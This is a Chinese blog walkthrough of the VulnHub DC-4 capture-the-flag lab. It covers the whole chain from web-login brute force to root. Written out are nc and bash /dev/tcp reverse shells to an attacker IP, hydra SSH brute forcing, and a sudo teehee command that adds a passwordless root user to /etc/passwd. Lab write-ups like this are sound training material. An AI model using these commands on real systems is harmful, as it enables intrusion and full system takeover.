zoukankan      html  css  js  c++  java
  • vulnhub 之 dc4

    0x00 前言

             做了三个靶机之后,感觉上之后的靶机做起来要轻松许多,看wp的次数也越来越少,所以多积累经验还是有好处的。

    0x01 爆破

    1)找到目标地址ip

    netdiscover

     2)  nmap端口扫描与去全面扫描

    nmap -p- -O 192.168.43.14

     开放了 80和22端口,先从80端口入手

    3)爆破

    访问80端口

     没有任何提示,就一个登陆窗口,测试了下sql注入,未果,爆破一下,盲猜用户名为admin,密码字典是之前随便在网上找的。用的工具是 turbe intruder 

    拿到一个弱口令, admin::happy

    0x02 命令执行

    拿口令登陆后台,白给了一个命令执行

     抓包就可随便更改她执行的命令

     0x03 getshell

    命令执行到getshell,可wget一个马,也可直接反弹。

    尝试 wget 本地的一个马 wget -O http://192.168.43.101/a.txt  shell.php  失败 没有写入权限 

    尝试反弹shell  bash -i >& /dev/tcp/192.168.43.116/4444 0>&1  失败

    尝试nc反弹shell     nc  -e /bin/bash 192.168.43.11 4444 成功反弹

     用python 模拟一个终端

    python -c 'import pty;pty.spawn("/bin/bash")'  

     0x04 提权

    uname -a查看版本内核 

     然后搜索了一下漏洞库,么有找到相应的漏洞,方法1失败。

    靶机开了ssh,可能可以爆破

    cat /etc/passwd 查看用户

     存在这三个用户。在home目录下找到关于他们的信息

     只有jim的目录下有东西,其他的没有,jim的东西可以发现有旧密码备份,尝试用此密码爆破ssh

    hydra -l jim -P pas.txt ssh://192.168.43.14 -vV

    成功拿到密码   jim::jibril104

     接下来拿去登陆ssh

    ssh  jim@192.168.43.14

     sudo -l 查看有没有可用的管理用命令,结果是没有。。。

    再 /var/mail 下找到 charles 给jim发的邮件,其中包含密码

     登陆charles

    su charles 

    切换后 sudo -l

     可以用teehee命令,百度一下teehee命令功能和提权

    用teehee命令写入一个用户到 /etc/passwd 就可

    echo "dimp::0:0:::/bin/bash" |  sudo teehee -a /etc/passwd

    passwd中得意思    [用户名]:[密码]:[uid]:[gid]:[身份描述]:[主目录]:[登陆shell]

    然后 su dimp 成功拿到管理员权限

     root目录下找到最终flag

     0x05 学到的知识

           nc反弹shell两种拌饭

     1 ) 攻击机:nc -lnvp 4444

        靶机: nc -e  /bin/bash 192.168.43.116 4444

        如果靶机的nc没有-e选项则采用第二种办法

     2)攻击机监听两个端口  4444与 5555

      靶机:nc 192.168.43.116 4444|/bin/bash|nc 192.168.43.116 4444

  • 相关阅读:
    http的url长度限制
    windows xp unlock 很慢
    C++的vector::push_back()和vector::resize()比较
    手机开发的7种机型列表
    DELPHI中对NT服务型程序的控制单元
    ICON图标下载地址汇总
    Solving the 'cannot find drf file' problem when compiling packages.
    Delphi常用属性和事件
    免费delphi组件收集
    Delphi中关于Canvas.TextOut
  • 原文地址:https://www.cnblogs.com/tlbjiayou/p/13091398.html
Copyright © 2011-2022 走看看